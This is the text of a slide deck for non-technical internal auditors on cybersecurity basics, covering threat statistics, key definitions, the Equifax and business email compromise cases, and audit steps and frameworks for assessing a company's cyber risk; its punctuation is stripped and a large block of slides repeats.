PRESENTED BY David Losacco, CPA, CIA, CISA Principal CYBERSECURITY 101 What Non-Technical Auditors Need to Know to Navigate the Cybersecurity Landscape.
PRESENTED BYDavid Losacco CPA CIA CISA Principal
CYBERSECURITY 101 What Non-Technical Auditors Need
to Know to Navigate the Cybersecurity Landscape
2
bull The comments and statements in this presentation are the opinions of the speaker and do not necessarily reflect the opinions or positions of Stinnett amp Associates LLC
bull This presentation is the property of Stinnett amp Associates LLC All rights reserved No part of this document may be reproduced transmitted or otherwise distributed in any form without written permission from Stinnett amp Associates LLC
bull Stinnett amp Associates LLC expressly disclaims any liability in connection with the use of this presentation or its contents by any third party
DISCLAIMER
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitions
bull What are some emerging cybersecurity trends and threats
bull What happened with some recent high-profile cybersecurity attacks
bull What are some cybersecurity roadblocks
bull What steps can Internal Audit take to evaluate your companyrsquos cybersecurity risk level
bull What can a Non-Technical Auditor do to evaluate your companyrsquos cybersecurity health
LEARNING OBJECTIVES
3
4
INTRODUCTION TO A CYBER CRIMINAL
5
WHAT DO ALL THESE COMPANIES HAVE IN COMMON
6
hellip AND THESE
7
List of Recent headlines
8
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
bull 51 of data breaches are caused by Organized Cyber Crime 18 are caused by Nation-States
bull 70 of cyber attacks and data breaches go undetected
bull 69 of organizations learn of their breach from an outside entity such as law enforcement customers or suppliers
bull In 2017 there were over 130 large-scale targeted breaches in the US per year and that number is growing by 27 percent per year
bull Small and mid-size businesses make up 43 of cyber crime targets
bull Cyber Crime costs estimated to reach $6 Trillion by 2021
bull 77 of organizations do not have a formal Cybersecurity Incident Response Plan
bull 147900000 consumer records impacted by Equifax breach in 2017 US Population is 327 Million
bull In 1st Quarter of 2017 60 of malware payloads were ransomware By the end of 2018 ransomwareaccounted for only 5 of malware
bull ldquoFilelessrdquo malware attacks increased 432 in 2017
bull Cyrptojacking attacks increased 8500 in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
2
bull The comments and statements in this presentation are the opinions of the speaker and do not necessarily reflect the opinions or positions of Stinnett amp Associates LLC
bull This presentation is the property of Stinnett amp Associates LLC All rights reserved No part of this document may be reproduced transmitted or otherwise distributed in any form without written permission from Stinnett amp Associates LLC
bull Stinnett amp Associates LLC expressly disclaims any liability in connection with the use of this presentation or its contents by any third party
DISCLAIMER
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitions
bull What are some emerging cybersecurity trends and threats
bull What happened with some recent high-profile cybersecurity attacks
bull What are some cybersecurity roadblocks
bull What steps can Internal Audit take to evaluate your companyrsquos cybersecurity risk level
bull What can a Non-Technical Auditor do to evaluate your companyrsquos cybersecurity health
LEARNING OBJECTIVES
3
4
INTRODUCTION TO A CYBER CRIMINAL
5
WHAT DO ALL THESE COMPANIES HAVE IN COMMON
6
hellip AND THESE
7
List of Recent headlines
8
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
bull 51 of data breaches are caused by Organized Cyber Crime 18 are caused by Nation-States
bull 70 of cyber attacks and data breaches go undetected
bull 69 of organizations learn of their breach from an outside entity such as law enforcement customers or suppliers
bull In 2017 there were over 130 large-scale targeted breaches in the US per year and that number is growing by 27 percent per year
bull Small and mid-size businesses make up 43 of cyber crime targets
bull Cyber Crime costs estimated to reach $6 Trillion by 2021
bull 77 of organizations do not have a formal Cybersecurity Incident Response Plan
bull 147900000 consumer records impacted by Equifax breach in 2017 US Population is 327 Million
bull In 1st Quarter of 2017 60 of malware payloads were ransomware By the end of 2018 ransomwareaccounted for only 5 of malware
bull ldquoFilelessrdquo malware attacks increased 432 in 2017
bull Cyrptojacking attacks increased 8500 in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
